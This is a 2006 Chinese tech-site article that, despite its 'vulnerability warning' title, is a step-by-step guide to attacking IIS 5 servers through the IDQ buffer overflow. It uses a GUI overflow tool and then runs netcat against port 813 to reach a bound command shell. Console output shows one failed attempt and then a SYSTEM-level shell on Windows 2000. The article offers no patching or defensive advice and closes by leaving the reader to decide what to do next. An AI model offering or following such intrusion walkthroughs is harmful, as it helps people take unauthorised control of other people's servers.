繁体中文
设为首页
加入收藏
当前位置:技术首页 >> 安全 >> 黑客攻防 >> 漏洞警告之值得注意的IDQ溢出漏洞

漏洞警告之值得注意的IDQ溢出漏洞

2006-12-23 22:41:59  作者:wendys   来源:黑客基地   浏览次数:64  文字大小:【】【】【

要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。

首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP。端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813,不改了。用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出,出现发送Shellcode成功的提示了,然后我们用NC来连接。

进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813

c:\>nc -vv IP 813 
IP: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [IP] 813 (?): connection refused 
sent 0, rcvd 0: NOTSOCK 
c:\>

看来没成功,别灰心,再来一次,换用IIS5 English Win2k Sp1试试。

c:\>nc -vv IP 813 
IP: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [IP] 813 (?) open 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 
C:\WINNT\system32>

哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。

责任编辑:雪焰

本文引用地址: http://tech.itzero.com/2006/1223/10474.html 请粘贴到你的QQ/MSN上推荐给你的好友

相关文章
巧妙配合asp木马取得管理权限
骗黑客 伪装Linux设置假象加固系统安全
经典推荐:由简到繁系统安全指南(四)
铸造 Outlook Express 的金刚不坏之身
让你瞧瞧 黑客眼中的防火墙与路由器
用 Pam_Abl 来保护 SSH 不被强行攻击
关于Linux网络安全的内在限制
系统安全之谈谈Linux和UNIX下的病毒
教你配置Linux操作系统安全管理服务
Linux安全基础
Linux安全:步步设防(2)
 

最新文章

更多

· 巧妙配合asp木马取得管理...
· Windows系统用户摆脱黑客...
· 存在于网页中的5种隐形危...
· 黑客教你穿透ADSL路由入...
· 红黑过招 WinRAR破解磁盘...
· 黑客攻击较去年下半年增48%
· 著名黑客凯文·米特尼克...
· 黑客用google查找漏洞网...
· 巧妙的化解分布式拒绝服...
· 黑客破解口令常用的三种方法

热点文章

更多

· 巧妙配合asp木马取得管理...

其它推荐